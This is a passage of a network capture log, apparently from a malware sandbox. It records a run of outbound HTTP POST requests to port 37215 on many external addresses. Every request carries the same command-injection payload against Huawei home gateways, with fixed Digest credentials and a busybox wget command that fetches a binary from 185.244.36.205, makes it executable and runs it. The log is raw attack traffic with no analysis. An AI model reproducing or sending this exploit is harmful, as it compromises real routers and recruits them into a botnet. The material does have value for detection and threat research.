                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              964192.168.2.1536856122.25.170.24237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540256023 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              965192.168.2.1557832102.85.185.6137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540292978 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              966192.168.2.1543426121.245.186.16537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540296078 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              967192.168.2.1547992122.251.189.17037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540316105 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              968192.168.2.153497437.93.105.737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540339947 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              969192.168.2.1555344197.52.0.5937215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540359974 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              970192.168.2.1542398186.251.166.1737215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540383101 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              971192.168.2.1542288122.176.142.21837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540430069 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              972192.168.2.1546382157.189.106.1537215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540431976 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              973192.168.2.1547128102.57.182.9237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.540431976 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              974192.168.2.1560082190.190.42.8037215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:15.541452885 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
